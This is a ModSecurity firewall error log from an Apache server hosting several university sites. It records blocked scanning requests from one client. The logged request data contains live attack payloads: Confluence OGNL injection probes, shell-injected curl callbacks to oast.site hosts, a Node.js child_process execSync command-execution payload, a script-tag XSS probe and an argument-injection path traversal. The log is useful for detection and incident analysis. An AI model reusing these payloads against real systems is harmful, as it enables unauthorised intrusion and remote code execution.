[Tue Aug 29 11:31:50.320471 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/confluence/pages/createpage-entervariables.action"] [unique_id "ZO10tsCo-f0AAAQV4P0AAAA3"]
[Tue Aug 29 11:31:50.393154 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wiki/pages/createpage-entervariables.action"] [unique_id "ZO10tsCo-f0AAAP8G14AAAAV"]
[Tue Aug 29 11:31:50.573744 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wiki/pages/createpage-entervariables.action"] [unique_id "ZO10tsCo-f0AAAPDn9kAAAAP"]
[Tue Aug 29 11:31:50.573744 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wiki/pages/createpage-entervariables.action"] [unique_id "ZO10tsCo-f0AAAP@M3kAAAAZ"]
[Tue Aug 29 11:31:50.579281 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\b\\xb7\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlgi3k6agyt7qj4b.oast.site+-H+'User-Agent:+LGgfDE'};\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\b\\xb7\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlgfgq6kaowrhqgz.oast.site+-H+'User-Agent:+LGgfDE'};"] [unique_id "ZO10tsCo-f0AAAQMrwoAAAAu"]
[Tue Aug 29 11:31:51.301219 2023] [:error] [pid 1018] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\b\\xb7\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlgdehdexop5w4hx.oast.site+-H+'User-Agent:+LGgfDE'};\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\b\\xb7\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlgkqxwqxmi66fy4.oast.site+-H+'User-Agent:+LGgfDE'};"] [unique_id "ZO10t8Co-f0AAAP6NQcAAAAQ"]
[Tue Aug 29 11:31:51.305600 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "pusatbahasa.unla.ac.id"] [uri "/\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\b\\xb7\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlgqg4mjtkq3w8hn.oast.site+-H+'User-Agent:+LGgfDE'};\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\b\\xb7\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlg6wgt7hkzwubgg.oast.site+-H+'User-Agent:+LGgfDE'};"] [unique_id "ZO10t8Co-f0AAAP5mLUAAAAM"]
[Tue Aug 29 11:31:51.307353 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: No boundaries found in payload."] [severity "CRITICAL"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10t8Co-f0AAAQMrwsAAAAu"]
[Tue Aug 29 11:31:51.307928 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: No boundaries found in payload."] [severity "CRITICAL"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10t8Co-f0AAAPDn9sAAAAP"]
[Tue Aug 29 11:31:51.308539 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: No boundaries found in payload."] [severity "CRITICAL"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10t8Co-f0AAAQV4QYAAAA3"]
[Tue Aug 29 11:31:51.311637 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: No boundaries found in payload."] [severity "CRITICAL"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10t8Co-f0AAAQkBYsAAAAC"]
[Tue Aug 29 11:31:51.317612 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wiki/pages/createpage-entervariables.action"] [unique_id "ZO10t8Co-f0AAAQR48MAAAAz"]
[Tue Aug 29 11:31:51.347612 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wiki/pages/createpage-entervariables.action"] [unique_id "ZO10t8Co-f0AAAQQym0AAAAy"]
[Tue Aug 29 11:31:51.372561 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:document. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:             (() => {\\x0a         found within ARGS:document:             (() => {\\x0a        const process = clearImmediate.constructor(\\x22return process;\\x22)();\\x0a        const result = process.mainModule.require(\\x22child_process\\x22).execSync(\\x22id > build/css/2Udxkf4l8YMdxIMziw7l7YPgbXU.css\\x22);\\x0a        console.log(\\x22Result: \\x22   result);\\x0a        return true;\\x0a    })()        "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/checkValid"] [unique_id "ZO10t8Co-f0AAAQR48UAAAAz"]
[Tue Aug 29 11:31:51.387040 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wiki/pages/createpage-entervariables.action"] [unique_id "ZO10t8Co-f0AAAQQym8AAAAy"]
[Tue Aug 29 11:31:51.393338 2023] [:error] [pid 1018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wiki/pages/createpage-entervariables.action"] [unique_id "ZO10t8Co-f0AAAP6NQsAAAAQ"]
[Tue Aug 29 11:31:51.415599 2023] [:error] [pid 1018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:document. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:             (() => {\\x0a         found within ARGS:document:             (() => {\\x0a        const process = clearImmediate.constructor(\\x22return process;\\x22)();\\x0a        const result = process.mainModule.require(\\x22child_process\\x22).execSync(\\x22id > build/css/2Udxkf4l8YMdxIMziw7l7YPgbXU.css\\x22);\\x0a        console.log(\\x22Result: \\x22   result);\\x0a        return true;\\x0a    })()        "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/checkValid"] [unique_id "ZO10t8Co-f0AAAP6NQwAAAAQ"]
[Tue Aug 29 11:31:51.423657 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: No boundaries found in payload."] [severity "CRITICAL"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10t8Co-f0AAAP@M4AAAAAZ"]
[Tue Aug 29 11:31:51.474612 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wiki/pages/createpage-entervariables.action"] [unique_id "ZO10t8Co-f0AAAP@M4IAAAAZ"]
[Tue Aug 29 11:31:51.477217 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:KEY_LENGTH. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x22..\\x5c found within ARGS:KEY_LENGTH: 1024 -providerclass Si -providerpath \\x22..\\x5cbin\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/RestAPI/Connection"] [unique_id "ZO10t8Co-f0AAAPiBl0AAAAB"]
[Tue Aug 29 11:31:51.494554 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:document. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:             (() => {\\x0a         found within ARGS:document:             (() => {\\x0a        const process = clearImmediate.constructor(\\x22return process;\\x22)();\\x0a        const result = process.mainModule.require(\\x22child_process\\x22).execSync(\\x22id > build/css/2Udxkf4l8YMdxIMziw7l7YPgbXU.css\\x22);\\x0a        console.log(\\x22Result: \\x22   result);\\x0a        return true;\\x0a    })()        "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/checkValid"] [unique_id "ZO10t8Co-f0AAAQR48oAAAAz"]
[Tue Aug 29 11:31:52.299204 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:document. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:             (() => {\\x0a         found within ARGS:document:             (() => {\\x0a        const process = clearImmediate.constructor(\\x22return process;\\x22)();\\x0a        const result = process.mainModule.require(\\x22child_process\\x22).execSync(\\x22id > build/css/2Udxkf4l8YMdxIMziw7l7YPgbXU.css\\x22);\\x0a        console.log(\\x22Result: \\x22   result);\\x0a        return true;\\x0a    })()        "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/checkValid"] [unique_id "ZO10uMCo-f0AAAPiBl4AAAAB"]
[Tue Aug 29 11:31:52.353567 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbfd\\xb8\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlgazsuk1ppkuk31.oast.site+-H+'User-Agent:+LGgfDE'};\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbfd\\xb8\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlge9kerp9easndh.oast.site+-H+'User-Agent:+LGgfDE'};"] [unique_id "ZO10uMCo-f0AAAP@M4MAAAAZ"]
[Tue Aug 29 11:31:52.397136 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "pusatbahasa.unla.ac.id"] [uri "/\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbfd\\xb8\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlgqsxqic7fbeahy.oast.site+-H+'User-Agent:+LGgfDE'};\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbfd\\xb8\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlga7jcwn47y88b4.oast.site+-H+'User-Agent:+LGgfDE'};"] [unique_id "ZO10uMCo-f0AAAQQynQAAAAy"]
[Tue Aug 29 11:31:52.405037 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wiki/pages/createpage-entervariables.action"] [unique_id "ZO10uMCo-f0AAAPiBmIAAAAB"]
[Tue Aug 29 11:31:52.536108 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/pages/doenterpagevariables.action"] [unique_id "ZO10uMCo-f0AAAPiBmgAAAAB"]
[Tue Aug 29 11:31:52.545537 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sgcgoogleanalytic. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)</ found within ARGS:sgcgoogleanalytic: <script>console.log(\\x22document.domain\\x22)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO10uMCo-f0AAAP5mLoAAAAM"]
[Tue Aug 29 11:31:52.552961 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbfd\\xb8\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlghpohwb6sxcuya.oast.site+-H+'User-Agent:+LGgfDE'};\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbfd\\xb8\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlgaqusycd9dracj.oast.site+-H+'User-Agent:+LGgfDE'};"] [unique_id "ZO10uMCo-f0AAAPDn@YAAAAP"]
[Tue Aug 29 11:31:52.582675 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:document. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:             (() => {\\x0a         found within ARGS:document:             (() => {\\x0a        const process = clearImmediate.constructor(\\x22return process;\\x22)();\\x0a        const result = process.mainModule.require(\\x22child_process\\x22).execSync(\\x22id > build/css/2Udxkf4l8YMdxIMziw7l7YPgbXU.css\\x22);\\x0a        console.log(\\x22Result: \\x22   result);\\x0a        return true;\\x0a    })()        "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/checkValid"] [unique_id "ZO10uMCo-f0AAAPDn@cAAAAP"]
[Tue Aug 29 11:31:52.602828 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/pages/doenterpagevariables.action"] [unique_id "ZO10uMCo-f0AAAPDn@gAAAAP"]
[Tue Aug 29 11:31:52.619375 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wiki/pages/createpage-entervariables.action"] [unique_id "ZO10uMCo-f0AAAQQynwAAAAy"]
